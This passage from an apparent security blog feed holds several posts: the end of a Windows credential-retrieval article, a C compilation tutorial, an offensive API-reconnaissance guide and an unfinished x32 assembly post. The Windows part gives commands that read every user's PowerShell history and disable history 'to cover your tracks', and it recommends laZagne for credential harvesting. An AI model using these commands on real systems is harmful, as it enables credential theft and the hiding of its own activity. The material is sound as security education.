Venturing into PowerShell history is like stepping into a time machine, where each command tells a story of past explorations. This history, often overlooked, can be a goldmine of information, revealing the digital footprints left behind by users.

**Viewing the Current User&apos;s History:**

Curious about your own PowerShell journey? To take a stroll down memory lane, use this command:

```powershell
(Get-PSReadlineOption).HistorySavePath

```

This reveals the path to your PowerShell history file, a diary of your command-line adventures.

**Listing History for All Users**

But why stop at your own history? To uncover the PowerShell activities of all users on a system, this command is your key:

```powershell
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

```

It&apos;s like having a master log of PowerShell sessions, providing insights into the commands executed by every user.

**Erasing Your PowerShell Tracks:**

Perhaps you want to cover your tracks, leaving no trace of your command-line escapades. In that case, this command is your digital eraser:

```powershell
Set-PSReadlineOption -HistorySaveStyle SaveNothing

```

Executing this will ensure that your future PowerShell commands become ephemeral, disappearing like whispers after execution.

PowerShell history isn&apos;t just a feature; it&apos;s a window into the past actions of users, offering a glimpse into the patterns, preferences, and practices within the command line. Whether for curiosity, investigation, or security, understanding and managing this history is a key skill in the repertoire of any tech enthusiast or professional.

### **Exploring Alternatives for Credential Harvesting**

In the digital realm of Windows, sometimes credentials hide in plain sight, nested within scripts, applications, and various nooks and crannies of the system. For the digital treasure hunter, this calls for a specialized tool - enter laZagne.

**laZagne: The Swiss Army Knife for Credential Recovery**

Think of laZagne as a master key for uncovering hidden credentials. This versatile tool delves into the depths of your system, searching through scripts and applications where login details might be inconspicuously stored. It’s like having a digital detective at your fingertips, sniffing out passwords and usernames that are essential for accessing various resources but might have been forgotten in the maze of digital storage.

Using laZagne, you can uncover a treasure trove of credentials you didn&apos;t even know were there, making it an invaluable asset in both system administration and cybersecurity endeavors. Whether you&apos;re patching up security loopholes or simply recovering forgotten access details, laZagne offers a straightforward and efficient path to your goal.

# **Conclusions: Navigating the Complexities of Windows Security and Credential Retrieval**

Throughout this article, we&apos;ve embarked on an in-depth journey into the world of Windows security, exploring the intricate processes of authentication and credential retrieval. From the detailed workings of Windows logon and various authentication methods to the advanced techniques for extracting credentials, we&apos;ve covered a broad spectrum of security aspects in Windows systems.

We delved into the crucial roles of the Local Security Authority (LSA) and Security Accounts Manager (SAM), uncovering how they function as the gatekeepers of user authentication and access. The exploration of PowerShell history added another dimension, showing how even the most routine of actions can leave behind a trail of valuable information.

Our foray into tools like Mimikatz, secretsdump, and laZagne opened our eyes to the possibilities and risks inherent in credential retrieval. We saw how these tools could be used for both protective and investigative purposes, offering insights into securing systems as well as understanding potential vulnerabilities.

As we conclude this exploration, it&apos;s clear that the world of Windows security is a complex and ever-evolving landscape. The knowledge and insights gained here are not just about understanding how to retrieve credentials but also about appreciating the intricacies of digital security. This journey equips us with the understanding to better navigate the challenges of safeguarding Windows environments, ensuring that we stay a step ahead in the dynamic world of cybersecurity.

# References

[Attacking Active Directory: 0 to 0.9 | zer1t0](https://zer1t0.gitlab.io/posts/attacking_ad/)

[Hacking Windows: Ataques a sistemas y redes Microsoft](https://0xword.com/es/libros/99-hacking-windows-ataques-a-sistemas-y-redes-microsoft.html)</content:encoded><author>Ruben Santos</author></item><item><title>Decoding the Compiler: A Deep Dive into the Phases of C Code Compilation</title><link>https://www.kayssel.com/post/binary-3</link><guid isPermaLink="true">https://www.kayssel.com/post/binary-3</guid><description>The C compilation process encompasses preprocessing, compiling to assembly, assembly to machine code, linking object files, and managing libraries. Symbols are key for functions and variables. Each phase contributes to creating efficient software for C programmers</description><pubDate>Fri, 24 Feb 2023 11:00:28 GMT</pubDate><content:encoded># Introduction

In our [previous chapter](https://www.kayssel.com/post/explotation-1-assembly/), we quickly touched upon the intriguing process of binary compilation. This time, we&apos;re diving deeper and getting our hands dirty with some real testing using the gcc compiler. Our goal? To understand the compilation process in its full glory, right down to the nitty-gritty details. For this adventure, we&apos;ll be working with a neat piece of C code, dissecting it through each phase of the binary compilation process. Here’s the code we&apos;ll be playing with:

```c
//test.c

#include &lt;stdio.h&gt;
#define FORMAT_STRING &quot;%s&quot;
#define MESSAGE &quot;Hello, world!\n&quot;

int main(int argc, char *argv[]) {
	printf(FORMAT_STRING, MESSAGE);
	return 0;
}

```

In this chapter, we&apos;re spicing things up by introducing two new phases: the preprocessing phase and the linking phase. So, get ready for an updated journey through the C Compilation process, where we’ll uncover more secrets and enhance our understanding of what really goes on under the hood.

![](/content/images/2023/02/compilationprocess.png)

The C Compilation process

# **The Preprocessing Phase: Setting the Stage for Code Magic**

Think of the preprocessing phase as the behind-the-scenes magic in the world of coding. It&apos;s like preparing the ingredients before cooking a meal. In this phase, what we&apos;re essentially doing is gathering all the necessary functions and macros from header files (like our good old friend `stdio.h`) and mixing them into our source code recipe. Why, you ask? Well, it&apos;s simple - our code needs these ingredients to perform functions like `printf`, the culinary equivalent of making our code &apos;speak&apos;.

![](/content/images/2023/02/carbon-1-.png)

Code sample after preprocessing phase

Let&apos;s peek into our `main.c` - notice how it&apos;s now fully equipped with all the `stdio` function headers? That&apos;s preprocessing for you, ensuring our code has everything it needs to execute successfully. Also, take a glance at how the `FORMAT_STRING` and `MESSAGE` macros are no longer just declarations; they&apos;re now part of the actual `printf` function. Pretty neat, right?

Now, how do we whip up this preprocessing magic using gcc? Just use this simple command:

```bash
gcc -E -P test.c

```

Here, `-E` is your stop sign, telling gcc to pause right after preprocessing. And `-P`? That&apos;s your neat filter, keeping those debugging messages out of your way.

So, there you have it - the preprocessing phase, where our code begins to take shape, ready for the culinary art of programming!

# **The Compilation Phase: From C to Assembly**

Welcome to the compilation phase, where our C code embarks on a transformative journey, morphing into assembly code. Imagine this phase as a meticulous translator, converting our high-level C language into a form that&apos;s closer to the machine&apos;s heart - assembly language.

But that&apos;s not all. Here, our compilers play the role of savvy editors, making optimizations to our code. These tweaks and tunings can lead to subtle yet impactful changes in the final assembly code - kind of like fine-tuning a recipe to perfection.

To navigate through this phase with gcc, we use a special set of commands:

```bash
gcc -S -masm=intel test.c

```

`-S` here is our trusty guide, ensuring that the journey ends right after the compilation, with the results neatly saved. The `-masm=intel`? That&apos;s like choosing the dialect of assembly language we prefer, opting for the Intel syntax in our case.

![](/content/images/2023/02/carbon-2-.png)

Intel Assembly Code

Now, let&apos;s peek into the world of assembly code. We don&apos;t need to dive too deep, but even at a glance, you can see the magic at work. Notice the label for our `main` function? That&apos;s our code, now in assembly attire. And look there! The string &quot;Hello, world!&quot; has its own label - `.LC0`. Drawing from our past chapters, we can even start to distinguish between the prologue and epilogue parts of a function.

# **The Assembly Phase: Crafting the Object File**

Now, we step into the assembly phase, where our code undergoes a remarkable transformation. It&apos;s like a caterpillar turning into a butterfly, but in the world of programming. Here, the assembler code, which is already close to the language of machines, is converted into pure machine code. This is the creation of what&apos;s known as the &quot;object file&quot; or &quot;module&quot;.

To bring this object file to life using gcc, here&apos;s the magic spell:

```bash
gcc -c test.c
```

The `-c` flag is our little helper in this process, dedicated to generating the object file.

But how do we really know what we&apos;ve created? Enter the `file` command, a window into the nature of our compiled file:

```bash
[rsgbengi@kaysel binary]$ file test.o
test.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped

```

And it speaks! The output tells us that `test.o` is an &quot;ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped&quot;. Let&apos;s decode this, shall we?

-   **ELF 64 bit**: Think of this as the DNA of our file – it&apos;s in the Executable and Linkable Format for 64-bit systems.
-   **LSB**: This stands for &apos;Least significant byte first&apos;, a way our data is ordered – it&apos;s the little-endian format.
-   **Relocatable**: Unlike a rigid statue, these files are flexible – they don&apos;t need a fixed spot in memory to exist. This is what sets an object file apart from an executable.

Here&apos;s the kicker: since these files are compiled independently, their memory addresses are like unknown variables during the assembly phase. That&apos;s why they need to be relocated in memory, or &apos;linked&apos;, so they can come together to form a complete executable.

So, in the assembly phase, we&apos;re not just building parts; we&apos;re preparing them for the grand assembly, where they all come together to form something greater.

# **The Linking Phase: Where Everything Comes Together**

Welcome to the grand finale of our compilation process - the Linking phase. Picture this as the moment where all the individual pieces of a puzzle find their place, creating a complete picture. In this phase, all the object files we meticulously crafted in the assembly phase are brought together, and voilà, an executable is born!

But who&apos;s the mastermind orchestrating this grand assembly? Enter the linker - the program that takes the baton from the compiler after its job is done. The linker is a bit like a conductor, seamlessly connecting various sections of an orchestra to create a harmonious symphony.

Here&apos;s where things get interesting: as the linker binds these object files, it also needs to make sense of references to variables and functions from other libraries. But there&apos;s a catch - the exact memory addresses of these functions and variables are like puzzle pieces hidden under the couch. They&apos;re unknown at this point.

This is where relocation symbols come into play. These symbols are like clues in a treasure hunt, guiding the linker on how to resolve each variable or function. When an object file depends on these relocation symbols to find its references, we call this a symbolic reference. It&apos;s a bit like saying, &quot;I know what I need, but I need some help finding out where it is.&quot;

So, in the linking phase, it&apos;s not just about bringing parts together; it&apos;s about ensuring they communicate and connect correctly, setting the stage for the final, runnable program.

![](/content/images/2023/02/symbols.png)

Symbolic reference vs relocation symbol

## **Static vs Dynamic Libraries: The Final Touch in Linking**

Once our linker has masterfully assembled all the pieces into a single executable, it&apos;s time for the grand resolution. Imagine this part as the final polish on a newly built sculpture. Here&apos;s where the magic of static and dynamic libraries comes into play.

First, let&apos;s talk about static libraries. These are like loyal friends who are always there for you. When the linker encounters references to static libraries, it resolves them completely, integrating their code directly into the executable. It&apos;s a bit like embedding all the ingredients into the cake before baking.

Dynamic libraries, on the other hand, are the social butterflies of the library world. They don&apos;t get fully resolved in the executable. Instead, they remain as symbolic references, akin to placeholders. Why? Because, unlike static libraries, dynamic libraries are loaded into memory just once, and this happens when the executable is run. It&apos;s like calling a friend to join the party at the right moment. These libraries are &apos;shared&apos; across different programs, hence the name.

![](/content/images/2023/02/staticvsdynamic.png)

Sample of resolutions

Now, to bring our compiled code to life with gcc, here&apos;s what we do:

```bash
[rsgbengi@kaysel] gcc test.c
[rsgbengi@kaysel] file a.out 
a.out: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e10050d173339c7473395a453a2a90fd6fa868a9, for GNU/Linux 3.2.0, not stripped

```

And there it is: `a.out`, our ELF 64-bit LSB executable, dynamically linked and ready for action. By default, gcc names the output `a.out`, but if you&apos;re feeling creative, you can give it a custom name using the `-o` flag.

Let&apos;s decode the identity of `a.out`:

-   **ELF and LSB**: Just as in the assembly phase, these terms describe the format and data ordering of our executable.
-   **Executable**: It&apos;s no longer just relocatable; now, it&apos;s a full-fledged executable, ready to run.
-   **Dynamically linked**: This means our executable is using those dynamic, social libraries.
-   **Interpreter**: The dynamic linker steps in here, resolving memory addresses of functions and variables from the dynamic library.
-   **Not stripped**: The binary retains symbols, which are like helpful notes, making debugging and understanding the executable easier.
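
A handy companion here is `ldd`, which asks the dynamic linker which shared libraries it would load for a binary. It is shown against `/bin/ls` as a stand-in; running it against your own `a.out` works the same way, and the exact library versions vary by system:

```bash
# List the shared libraries the dynamic linker resolves at run time
ldd /bin/ls
```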

## **Symbols: The Compiler&apos;s Glossary**

In the world of programming, &apos;symbols&apos; are like the nicknames that a compiler gives to various functions and variables after it&apos;s done compiling the code. They&apos;re not just names, though. These symbols are intricately linked to their corresponding data and binary code, forming a crucial part of the program&apos;s DNA.

Imagine you&apos;ve written some C code. Now, to see these symbols in action, we can use a tool like radare2, a Swiss Army knife for reverse engineering. We&apos;ll explore radare2 more in future articles, but for now, here&apos;s a sneak peek:

```bash
radare2 test

```

![](/content/images/2023/02/carbon-3-.png)

Symbols of the executable

Alternatively, for a more traditional route, we can turn to the Linux `readelf` command. This handy tool lets us peek into the symbol universe of our compiled code. Here&apos;s how it works:

```bash
readelf --syms test

```

![](/content/images/2023/02/carbon-4-.png)

readelf to show the symbols of the executable

Reading the output is like decoding a secret message. You&apos;ll see the main symbol, marked as a function (FUNC), and a whole list of other symbols. Some of these symbols are like mystery guests (from dynamic libraries) without established memory addresses. Others are more like permanent residents, with fixed addresses (from static libraries or the same file).

But here&apos;s a plot twist: not all symbols are crucial for the binary to function. In fact, in the shadowy world of malware, these symbols are often stripped away to make reverse engineering a headache for security experts.

Want to see how to strip symbols yourself? Just use this Linux command:

```bash
strip -s test

```

![](/content/images/2023/02/carbon-5-.png)

readelf to read the binary after removing the symbols.

After this, if you inspect the file again, you&apos;ll notice a significant part of the previous information is gone, like magic. It&apos;s now labeled as &quot;stripped&quot;, streamlined and a bit more mysterious.

![](/content/images/2023/02/carbon-6-.png)

Shows that binary has been stripped of its symbols 

# **Conclusions: Mastering the Art of Compilation**

Throughout our journey into the fascinating world of code compilation, we&apos;ve unraveled the mysteries hidden behind each line of C code. From the preprocessing phase, where we set the stage with necessary functions and macros, to the intricate workings of the compilation phase, transforming our code into assembly language, we&apos;ve seen how each step plays a pivotal role in bringing a program to life.

In the assembly phase, our code underwent a remarkable transformation into machine code, resulting in the creation of an object file. This phase highlighted the importance of understanding the low-level aspects of programming and how they contribute to the overall functionality of our applications.

The linking phase was the grand finale where all these compiled pieces came together. We explored the nuances of static and dynamic libraries, understanding their roles and how they impact the final executable. This phase emphasized the importance of efficient memory management and the role of linkers in resolving references to create a cohesive and runnable program.

Moreover, the exploration of symbols revealed the intricacies of how compilers reference functions and variables. We delved into tools like radare2 and readelf, providing a glimpse into the world of reverse engineering and the significance of symbols in understanding and debugging our code.

In essence, this article series has been a deep dive into the art of compilation, equipping you with the knowledge and appreciation of what goes on under the hood of C programming. As we conclude, remember that each phase of compilation is a step towards creating efficient, functional, and robust software. With these insights, you&apos;re now better prepared to navigate the complexities of programming, armed with a deeper understanding and a newfound respect for the compilation process.

# References

[Introduction - The Official Radare2 Book](https://book.rada.re/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploring the API Realm: An Introductory Guide to Recognition in RESTful and GraphQL APIs</title><link>https://www.kayssel.com/post/api-hacking-1</link><guid isPermaLink="true">https://www.kayssel.com/post/api-hacking-1</guid><description>Explore the world of APIs in this series covering Restful and GraphQL paradigms. Learn about JSON, API recognition, versioning, and Introspection Query for GraphQL.</description><pubDate>Fri, 17 Feb 2023 11:00:45 GMT</pubDate><content:encoded># **Introduction: Unveiling the World of APIs**

In the ever-evolving digital landscape, Application Programming Interfaces (APIs) serve as the unsung heroes, quietly orchestrating the seamless interplay between various applications and services. These critical components underpin the vast web of modern connectivity, making them indispensable to our digital existence.

This series is crafted for enthusiasts and professionals in offensive security, diving deep into the fascinating realm of APIs. We embark on an exploratory journey through two distinct yet equally compelling API paradigms: Restful and GraphQL. Whether you are a seasoned expert in security intricacies or a curious newcomer keen to venture into this aspect of digital safeguarding, our series promises insights, engagement, and a trove of valuable knowledge.

Together, we will navigate the nuances of API identification, the importance of version management, and the potent capabilities of the Introspection Query in GraphQL. Our goal is to arm offensive security practitioners with the knowledge and tools necessary to exploit and harness these pivotal digital components effectively. Many of the techniques we&apos;ll explore throughout this series are detailed in a repository that has been a cornerstone of our discussion: [https://github.com/DeathChron/Talks](https://github.com/DeathChron/Talks). This repository not only hosts a wealth of information but also showcases the collaborative effort between myself and a friend known in the digital security community as @pwnedshell, whose insights have been invaluable.

Embark on this enlightening journey through the API landscape, where we dissect the complexities of Restful and GraphQL APIs, reveal their unique strengths and vulnerabilities, and guide you through the digital world with an informed and tactical perspective. The adventure starts here, opening doors to limitless possibilities for those adept in the craft of digital offense.

# **What is an API? The Digital Bridge of Communication**

Have you ever marveled at how different software applications talk to each other as if they&apos;re old friends? The secret lies in the world of APIs, or Application Programming Interfaces. Imagine an API as a skilled interpreter, effortlessly translating and conveying messages between your computer and a universe brimming with data sources and complex backend logic.

Here&apos;s the magic: when you shoot a request across the web, it&apos;s the API that hustles to fetch and carry back the information you seek. This digital courier typically delivers the goods in plain text, often dressed in formats like JSON (JavaScript Object Notation) or XML (eXtensible Markup Language). Of these, JSON is like the cool kid on the block – user-friendly, agile, and increasingly popular among developers for its approachability.

# **What is JSON? A Computer&apos;s Favorite Language**

Imagine a language that&apos;s music to a computer&apos;s ears – that&apos;s JSON, or JavaScript Object Notation, for you. It&apos;s the digital equivalent of a sleek sports car: fast, efficient, and easy on the eyes. JSON is a favorite in the realm of digital communication for its straightforward way of representing data in text format. To truly appreciate the elegance of JSON, let&apos;s zoom in on three of its key features:

1.  **Curly Braces – The Welcoming Gates**: Every JSON journey starts and ends with curly braces ({}). Think of these like the &apos;hello&apos; and &apos;goodbye&apos; of a conversation. They&apos;re the welcoming gates and the fond farewells of the JSON world.
2.  **Objects and Lists – The Organizers**: Nestled within these curly braces, JSON communicates using objects (enclosed in {}) and lists (encased in square brackets \[\]). This is where JSON shows its organizational prowess, neatly categorizing data for clarity and ease of access.
3.  **Key-Value Pairs – The Heart of the Matter**: At the core of JSON&apos;s communication style are key-value pairs. This is where JSON says, &quot;This is &apos;A&apos;, and it stands for &apos;B&apos;.&quot; It&apos;s a straightforward, no-nonsense approach that makes data not just orderly, but also intuitively easy for both humans and computers to understand and process.

![](/content/images/2023/01/jsonExample-1--1.png)

Example of Restful API response


# **Diving into the World of APIs: Restful and GraphQL**

## **Restful APIs: The Gentle Giants of the Web World**

Restful APIs are like the gentle giants of the web programming world. They&apos;re popular for a good reason: their knack for using JSON for both sending and receiving data makes them incredibly user-friendly. Picture them as the reliable workhorses behind many web applications, structuring their requests in a way that aligns perfectly with the Create, Read, Update, and Delete (CRUD) functionalities. This isn&apos;t just about keeping things orderly; it&apos;s about making data management as smooth as a jazz tune.

![](/content/images/2023/01/CRUDExampleRest-1.png)

Restful API CRUD

## **GraphQL: The Customized Maestro of Queries**

Enter GraphQL, the maestro of custom queries. Unlike the multi-endpoint approach of its Restful counterparts, GraphQL conducts its symphony through a single endpoint. This approach is like having a genie in a bottle – depending on your query, it can conjure up a variety of data in JSON format. It&apos;s this tailored approach that makes GraphQL a hit, especially for complex applications that demand a more nuanced data retrieval. Think of GraphQL as the jazz improvisation to Restful&apos;s classic orchestra – both create beautiful music, but in very different ways.

![](/content/images/2023/01/CRUDExampleGraphql-1.png)

GraphQL API CRUD

# **Restful API vs GraphQL: Understanding the Key Differences**

Now that we&apos;ve introduced the two heavyweight champions in the API arena – Restful and GraphQL – it&apos;s time to dive into what really sets them apart. At their core, these two models approach the task of data handling in distinct ways, each with its own set of strengths and challenges.

## **GraphQL: The One-Stop Shop**

Imagine walking into a store where you can get everything you need in one go. That&apos;s GraphQL for you. It operates through a single endpoint, a one-stop shop where clients send their data requests. The beauty of this approach? It&apos;s incredibly efficient. You ask for exactly what you need, and GraphQL delivers just that, nothing more, nothing less. This tailored response mechanism can lead to better performance, especially for complex queries.

## **Restful APIs: The Diverse Marketplace**

In contrast, Restful APIs are like a bustling marketplace with different stalls for different needs. Each endpoint in a Restful API is designed for a specific action. Want to read data? There&apos;s an endpoint for that. Update something? There&apos;s another endpoint waiting for you. This division allows for a clear, organized structure where each endpoint knows its job.

## **The Trade-Off: Simplicity vs. Flexibility**

However, with great power comes great responsibility. The single endpoint design of GraphQL, while flexible, adds layers of complexity. It&apos;s like having a conversation where you need to be very specific about what you ask for. Get it right, and you&apos;re golden. But any ambiguity can lead to errors or unintended results. Restful APIs, with their multiple endpoints, might seem less efficient, but this separation can make them more straightforward and less prone to errors in specific scenarios.

![](/content/images/2023/01/graphqlvsrest.png)

RestFul vs GraphQL

# **Restful APIs Recognition: Mastering the Art of API Exploration**

When it comes to understanding Restful APIs, think of it as a detective game where the goal is to gather as much information about your target as possible. Here are four essential steps to become an API sleuth:

## **API Documentation: The Treasure Map**

Just like a treasure map, API documentation is a goldmine. It often lists endpoints and provides detailed instructions on how to interact with the API. Hunting for specific API documentation? Turn to Google with keywords like &quot;\[target\] developers docs&quot; or &quot;\[target\] API&quot;. This is often your first step in understanding the API landscape you&apos;re exploring.

## **Crawling the Webpage: The Explorer&apos;s Tool**

Next, think like an explorer. Use web crawling – a technique where software collects all existing links on a webpage. This is crucial for uncovering hidden API endpoints. Tools like Burp&apos;s crawler are perfect for this task. As you navigate through the target&apos;s pages, Burp collects data, which you can later analyze in the &apos;Site Map&apos; section.

![](/content/images/2023/01/image-38.png)

Site Map created using Burp&apos;s crawler

## **Guessing Existing Resources: The Art of Fuzzing**

Now, put on your detective hat and start guessing the resources an API might have. This is where &apos;fuzzing&apos; comes in – using lists of common words in APIs to discover potential resources. Resources like SecLists and Assetnote&apos;s wordlists are invaluable here. They offer a curated collection of terms frequently used in API hacking, helping you uncover hidden or undocumented aspects of the API.

-   SecLists: [SecLists/Discovery/Web-Content/api at master · danielmiessler/SecLists](https://github.com/danielmiessler/SecLists/tree/master/Discovery/Web-Content/api)
-   Assetnote Wordlists: [Assetnote Wordlists](https://wordlists.assetnote.io/)

## **Utilizing Burp&apos;s Intruder for Fuzzing**

Finally, it&apos;s time to get hands-on with Burp&apos;s Intruder tool. This tool allows you to select specific parts of the API and test them using your chosen wordlists. It&apos;s a powerful way to actively probe and understand the API&apos;s structure and potential vulnerabilities.

![](/content/images/2023/01/image-40.png)

Selection of the part to be fuzzed

![](/content/images/2023/01/image-39.png)

Results after fuzzing

## **API Versioning: Navigating Through Time and Changes**

The final piece of our API exploration puzzle is understanding API versioning. It&apos;s like having a time machine for APIs, where each version can tell a different story, especially in terms of functionality and security.

### **Why Versioning Matters**

Imagine an endpoint in an API – let&apos;s say, one that&apos;s used for changing a user&apos;s password. In its latest version, this endpoint might be fortified against vulnerabilities. But what about its earlier versions? There could be a version out there, less secure, like a door left slightly ajar. This is where the importance of API versioning shines. It&apos;s crucial to identify if there are different versions of the same endpoint, each with its own set of functionalities and security features.

### **The Art of Enumerating Versions**

To effectively map out these versions, you can employ the techniques of webpage crawling and fuzzing, as discussed earlier.

1.  **Webpage Crawling**: By crawling through the webpages of your target API, you can uncover various versions of endpoints. This process can reveal the evolution of the API, showing how endpoints have changed over time.
2.  **Fuzzing**: This technique allows you to test different endpoints for various versions. By applying fuzzing, you can discover how the same endpoint behaves across different versions of the API. It&apos;s like testing each door to see how securely it&apos;s locked.

Having a comprehensive list of endpoints for each version of the API you&apos;re investigating is like having a detailed map of a treasure island. It guides you to understand not just where the vulnerabilities might be, but also how they have been addressed over time.

In summary, API versioning is not just about keeping up with changes; it&apos;s about understanding the history and evolution of an API&apos;s security and functionality. As we wrap up our journey through the world of APIs, remember that each version has its own story to tell, and it&apos;s up to us to listen and learn.

![](/content/images/2023/01/versionapi-1.png)

API versioning

# **Recognizing GraphQL APIs: A Step Towards Simplified Testing**

When it comes to recognizing GraphQL APIs, the process is somewhat streamlined compared to Restful APIs, thanks to a variety of specialized tools and techniques at our disposal.

## **Detecting GraphQL: The Tools of the Trade**

### **Using a Crawler**:

Just like with Restful APIs, a crawler can be a handy tool. The Burp Suite crawler, for instance, can be effectively used to detect GraphQL endpoints. It&apos;s like using a digital magnifying glass to scrutinize the web application&apos;s structure.

![](/content/images/2023/01/image-41.png)

### **Specialized Tools - graphw00f**:

For a more GraphQL-focused approach, tools like graphw00f come into play. Designed specifically for GraphQL recognition tasks, graphw00f can efficiently identify GraphQL usage within a web application.

![](/content/images/2023/01/image-31.png)

### Fuzzing for endpoints

If the endpoint still eludes you, fuzzing remains a reliable fallback, similar to the approach in Restful APIs. However, the choice of wordlist shifts to cater to GraphQL&apos;s structure. A recommended resource is the SecLists GraphQL wordlist, which can be found here: [SecLists/graphql.txt](https://github.com/danielmiessler/SecLists/blob/fe2aa9e7b04b98d94432320d09b5987f39a17de8/Discovery/Web-Content/graphql.txt).


## **Fingerprinting GraphQL: Digging Deeper**

Beyond just detection, graphw00f can also be used for &apos;fingerprinting&apos; GraphQL. By using its &quot;-f&quot; parameter, you can glean insights into the technology and the specific GraphQL engine being used by the application.

![](/content/images/2023/01/image-32.png)

## **Integrating with Burp Suite for Enhanced Testing**

For a more hands-on testing experience, integrating GraphQL testing into Burp Suite is advisable. This involves installing the InQL extension, which simplifies the process of crafting and sending GraphQL queries, particularly useful when working with the Repeater tool. To set this up, you&apos;ll need to first install Jython, a Java implementation of Python, and then proceed to add the InQL extension via the Burp Suite&apos;s BApp Store.

![](/content/images/2023/01/image-54.png)

![](/content/images/2023/01/image-53.png)

Select Jython as the Python environment

![](/content/images/2023/01/image-86.png)

Install the plugin

## **Introspection Query: Unveiling the Depths of GraphQL**

In the world of GraphQL, one of its most enlightening features is the &quot;Introspection Query.&quot; But what exactly is this powerful tool?

### **Understanding Introspection Query**

Introspection Query is like having a detailed map of a treasure island. It allows you to ask the API, &quot;What resources do you have?&quot; This query reveals the available queries, types, fields, and directives in the current API schema. It&apos;s a way to understand the structure and capabilities of the API from the inside out.

### **Executing an Introspection Query with Burp and GraphQL**

Imagine you&apos;re a digital archaeologist. You&apos;ve just found a way to unearth the secrets of a GraphQL API. Using tools like Burp Suite, you can send an Introspection Query to the API. Here&apos;s how it works:

1.  Capture a request with Burp that involves GraphQL.
2.  In the InQL tab (after installing the InQL extension), paste your Introspection Query. This query can be sourced from resources like PayloadsAllTheThings.

![](/content/images/2023/01/image-33.png)

Sample request using GraphQL

![](/content/images/2023/01/image-34.png)

Paste our Introspection query in the InQL tab

### **Deciphering the Response**

The response to an Introspection Query is a treasure trove of information, albeit in a complex JSON format that might seem like a cryptic ancient script. How do you make sense of it?

![](/content/images/2023/01/image-35.png)

Sample of the response to the request

### **Enter GraphQL Voyager**

This is where GraphQL Voyager becomes your Rosetta Stone. By pasting the JSON response into GraphQL Voyager, you can transform this dense information into a visually understandable format. It&apos;s like turning a dense, unreadable manuscript into an easy-to-navigate map.

![](/content/images/2023/01/image-36.png)

Sample of pasting the answer in GraphQL Voyager

![](/content/images/2023/01/image-37.png)

More visual response

### **Visualizing API Requests with InQL Scanner**

To further enhance your understanding, the InQL Scanner in Burp Suite can be used. This tool visually represents all possible requests, turning the abstract data from your Introspection Query into a more tangible and comprehensible format.

![](/content/images/2023/01/image-81.png)

InQL Scanner

# Conclusions: **Charting New Frontiers in API Mastery**

As we conclude our expedition into the realms of Restful and GraphQL APIs, we emerge with a deeper understanding of their intricacies and capabilities. Just as explorers map uncharted territories, we&apos;ve navigated the complexities of API recognition, versioning, and the invaluable Introspection Query.

Restful APIs, with their structured endpoints, offer clarity and organization, while GraphQL, the agile storyteller, wields the power of tailored data retrieval through a single endpoint. Both have their roles in the ever-evolving landscape of web applications.

From the detective work of recognizing APIs to the time-traveling journey of versioning, we&apos;ve uncovered the tools and techniques essential to becoming API maestros. The Introspection Query, akin to deciphering ancient scrolls, revealed the inner workings of GraphQL, with GraphQL Voyager as our linguistic key.

Our adventure serves as a testament to the relentless pursuit of knowledge in the digital age. As technology evolves, so too does our understanding of it. With APIs as our compass, we continue to chart new frontiers in the ever-expanding digital universe.

So, fellow explorers, may your API journeys be filled with discovery, mastery, and the thrill of unraveling the unknown. Onward to new horizons!

## References

[PayloadsAllTheThings/GraphQL Injection at master · swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection)

[GraphQL Voyager](https://ivangoncharov.github.io/graphql-voyager/)

[How to exploit GraphQL endpoint: introspection, query, mutations &amp; tools - Global Bug Bounty Platform](https://blog.yeswehack.com/yeswerhackers/how-exploit-graphql-endpoint-bug-bounty/)</content:encoded><author>Ruben Santos</author></item><item><title>Dancing with Functions: Unraveling the Assembler Function Convention in x32</title><link>https://www.kayssel.com/post/binary-explotation</link><guid isPermaLink="true">https://www.kayssel.com/post/binary-explotation</guid><description>Explore x32 function calling, the dance of frame pointers, and the ballet of call instructions. Each segment crafts an eloquent narrative in the intricate performance on the stack. Witness the artistry of assembly language unfold.</description><pubDate>Fri, 10 Feb 2023 11:22:47 GMT</pubDate><content:encoded># Introduction

Step into the intricate world of assembly language, where each instruction orchestrates a ballet of bytes and registers. In this exploration, we delve into the heart of the assembler function convention, uncovering the silent rules that govern the exchange of information within the stack. Get ready for a journey behind the scenes, from the dazzling entrance of functions to the graceful exit upon completion.

# Unlocking the Dance: Assembler Function Convention in x32

Imagine a function&apos;s frame as the stack&apos;s VIP lounge, reserved for arguments, local variables, and the return address. As functions step into the limelight, new frames join the party and gracefully exit upon completion. The stack&apos;s top, ever the socialite, adjusts dynamically, ensuring the current function takes center stage.

To paint a clearer picture, let&apos;s dissect a code snippet:

```c
#include &lt;stdio.h&gt;

void function_b(int param_3, int param_4);
void function_c(int param_5);

void function_a(int param_1, int param_2) {
        int var_1 = 10;
        int var_2 = 11;
        function_b(3, 4);
}
void function_b(int param_3, int param_4) {
        int var = 12;
        function_c(5);
}
void function_c(int param_5) {
        int var = 13;
}

int main() {
        function_a(1, 2);
        printf(&quot;Message\n&quot;);
        return 0;
}

```

As the script unfolds, the stack elegantly transforms, each function adding its unique touch to the stack&apos;s haute couture.

![](/content/images/2023/02/functionconvention.png)

Display of the stack status while function_c is executing

## Guiding the Dance: The Eloquent Frame Pointer (ebp, rbp)

In the mysterious world of compilation, the exact memory addresses of local variables or arguments remain hidden. Enter the `ebp` register—the Sherlock Holmes of function frames. This savvy register stakes out a fixed address within the function frame, providing a secret passage to various arguments or local variables. The subtraction of `ebp`&apos;s memory address is akin to finding the hidden door to access local variables, with the subtracted size dancing to the rhythm of the data type.

![](/content/images/2023/02/functionconvention-1-.png)

Sample of how to access arguments and local variables using ebp
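To make the offsets concrete: in the x32 convention, arguments sit at positive offsets from `ebp` (with `ebp+4` holding the return address) and local variables at negative ones. Assuming 4-byte integers, the access pattern looks like this:

```nasm
mov eax, [ebp+8]    ; first argument  (ebp+4 is the return address)
mov ebx, [ebp+12]   ; second argument
mov ecx, [ebp-4]    ; first local variable
mov edx, [ebp-8]    ; second local variable

```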

## Onstage Elegance: Call Instructions and the VIP Lounge

Before a function makes its grand entrance, parameters and the return address are sipping on espresso cups in the stack&apos;s VIP lounge. The assembly instructions set the stage:

```nasm
